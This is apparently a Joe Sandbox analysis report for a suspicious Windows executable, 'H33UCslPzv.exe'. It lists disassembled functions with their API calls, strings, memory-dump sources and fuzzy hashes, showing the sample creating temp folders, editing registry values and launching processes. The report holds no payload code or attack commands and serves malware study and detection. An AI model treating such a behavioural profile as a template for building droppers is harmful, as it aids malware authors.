GetTickCount.KERNEL32 ref: 00405BC9
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BB8
nsa, xrefs: 00405BC0
"C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00405BB5

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2915536943
Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758

Function 700216DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D09
Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D0E
Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D13

GlobalFree.KERNEL32(00000000), ref: 70021786
FreeLibrary.KERNEL32(?), ref: 70021809
GlobalFree.KERNEL32(00000000), ref: 7002182E

Part of subcall function 700222AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700222E0

Part of subcall function 700226B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70021757,00000000), ref: 70022782

Part of subcall function 7002156B: wsprintfA.USER32 ref: 70021599

Strings

, xrefs: 7002180F

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: c0e49ddc98c45a6c5974f287828ed1a120217fa92ce1a545e1462e3c8aadc18b
Instruction ID: d26e5cec9199b6e92e57e19f15da0513dfe9973c9afe60b1a37dcf125d06428f
Opcode Fuzzy Hash: c0e49ddc98c45a6c5974f287828ed1a120217fa92ce1a545e1462e3c8aadc18b
Instruction Fuzzy Hash: 4B41B172104204AEDB01AF74EDC5BDE37FDBB54A32F248069F9069A297DF749485CBA0

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004055DA: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\unscorified\Pacinian,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\unscorified\Pacinian
API String ID: 1892508949-1480192069
Opcode ID: 04e6969c0dcd3601385fd0e2838c4dafd03fce5596fd6c1ac1cfe2f5b2968c32
Instruction ID: afd89d35c011052612b9933dc16c135e328f8afd03e06d15a27ba8224079e4e0
Opcode Fuzzy Hash: 04e6969c0dcd3601385fd0e2838c4dafd03fce5596fd6c1ac1cfe2f5b2968c32
Instruction Fuzzy Hash: AC112731508141EBDB217FB54D4197F36B49E96324F28453FE4D1B22E2DA3D4842AA2E

Function 00405ED4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406118,80000002), ref: 00405F1A
RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405F25

Strings

Call, xrefs: 00405ED7, 00405F0B

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
Opcode Fuzzy Hash: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8

Function 0040568C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
CloseHandle.KERNEL32(?), ref: 004056C2

Strings

Error launching installer, xrefs: 0040569F

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
Instruction ID: 2140ebbf1eee4cb4891f52a8ff1fd75339fa61df53f1a1a9c1e04f6e33d43294
Opcode Fuzzy Hash: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
Instruction Fuzzy Hash: 40E0BFF5610209BFEB009FA4DE05F7B7BBDEB40704F404925BD10F2160D774A8148A78

Function 00401B63 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BD2
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BE4

Strings

Call, xrefs: 00401B8A, 00401B90, 00401BAA

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 0c7e03365e78e5f53160c38106d7799ec7c3d82922276c3652d28a6b45986a8d
Instruction ID: d2abead86699fb04bb4c65c6c7568298ee189deef15247f37ebdc11345ca5c8d
Opcode Fuzzy Hash: 0c7e03365e78e5f53160c38106d7799ec7c3d82922276c3652d28a6b45986a8d
Instruction Fuzzy Hash: 902163B36001019BDB10EBA4DE85D6E73E9EB49328B20443BF501F32D1E77D98419B9D

Function 00401EC3 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 004056CF: ShellExecuteExA.SHELL32(?,00401F29,?), ref: 004056DE

Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D

CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D

Strings

C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 00401F11
@, xrefs: 00401F31

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
String ID: @$C:\Users\user\AppData\Local\Temp\unscorified\Pacinian
API String ID: 165873841-2405383263
Opcode ID: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
Instruction ID: 6fb4e818f2c942e9b4bba88a026eebdec746967c1f1042f55a0f18c21242a27d
Opcode Fuzzy Hash: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
Instruction Fuzzy Hash: DA113D71E042049ACB12EFB98A45A8DBFF4AF09318F24057BE555F72D2DBB88801DB18

Function 0040254C Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402591
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
Instruction ID: dbd097197b1ddcdec4c3bfd44c4d49ca57d6fe8d8a156bba66eafe5791494d89
Opcode Fuzzy Hash: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
Instruction Fuzzy Hash: D801BCB1901204FFE711DF699E89ABF7ABCEB81344F10403EF442B62C0D6B84E009629

Function 0040576D Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405B61: GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
Part of subcall function 00405B61: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A

RemoveDirectoryA.KERNEL32(?,?,?,00000000,0040595C), ref: 00405788
DeleteFileA.KERNELBASE(?,?,?,00000000,0040595C), ref: 00405790
SetFileAttributesA.KERNEL32(?,00000000), ref: 004057A8

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
Instruction ID: 89e2ffb4eeb90fd48554f64b8be6f4befc75c99c48748cc7a9a51ea4a82828fd
Opcode Fuzzy Hash: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
Instruction Fuzzy Hash: 79E0E531115A5096C21057348E0CB5F2A98DFC6724F05093AF992F30C0D77C49469A7E

Function 004024DA Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 0040250A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx6761.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
Instruction ID: e432cc5542b3a476208e1b79bea1c70747d30db9775ab40f8372a11ce444457e
Opcode Fuzzy Hash: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
Instruction Fuzzy Hash: 5E118C71901205FEDB11CF64CA5D9AEBAB4AF19348F60447FE442B62C0D6B88A45DB2D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
Instruction ID: e022dd21a705f7d2fe13c48a1103892d377d282aa69ae92f3ff2ae7c0e9cbe23
Opcode Fuzzy Hash: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B2A36A8E751354F10813FF955F65F2D678CC028B4C

Function 004023E8 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402409
RegCloseKey.ADVAPI32(00000000), ref: 00402412

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
Instruction ID: 49501c94728b366df12ca2e4d909b612e79837c42632e001697d6088b151e408
Opcode Fuzzy Hash: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
Instruction Fuzzy Hash: 5BF0BB32A00120ABD701AFB89B4DBAE72B99B54314F15417FF502B72C1D5FC5E01876D

Function 004025EA Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 0040260B

Strings

C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll, xrefs: 004025FC, 00402621

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
